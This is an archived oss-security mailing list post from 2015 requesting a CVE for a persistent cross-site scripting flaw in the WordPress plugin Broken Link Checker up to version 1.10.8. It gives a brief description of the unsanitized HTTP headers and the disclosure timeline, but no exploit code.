oss-security - CVE Request for Wordpress-Plugin Broken Link Checker v1.10.8: Persistent XSS in admin panel enabled by modified headers

Follow @Openwall on Twitter for new release announcements and other news

[<prev] [next>] [thread-next>] [day] [month] [year] [list]

Message-ID: <558AC98E.4070709@hsasec.de>
Date: Wed, 24 Jun 2015 17:15:26 +0200
From: Responsive Disclosure | HSASec <disclosure@...sec.de>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>, 
 cve-assign@...re.org
Subject: CVE Request for Wordpress-Plugin Broken Link Checker v1.10.8: Persistent
 XSS in admin panel enabled by modified headers

Greetings,

we discovered a vulnerability in the following component and want to
request a CVE for it:

Product-Type:     
Wordpress Plugin

Product:         
Broken Link Checker (https://wordpress.org/plugins/broken-link-checker/)

Version:         
up to 1.10.8

Vendor:         
Janis Elsts (http://w-shadow.com/)

Fixed:             
reported: 2015-04-05
fixed in version 1.10.9, 2015-06-19

Changelog:         
https://wordpress.org/plugins/broken-link-checker/changelog/

PoC available:     
yes (internal)

Description:
Persistent XSS in wordpress-admin-panel enabled by not proper sanitized
HTTP-Headers.
There are no special priviliges required to exploit this vulnerability.

Researchers:
* Michael Kapfer (Michael.Kapfer@...augsburg.de)


Best regards,
 the HSASec-Team
 (https://www.hsasec.de)

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.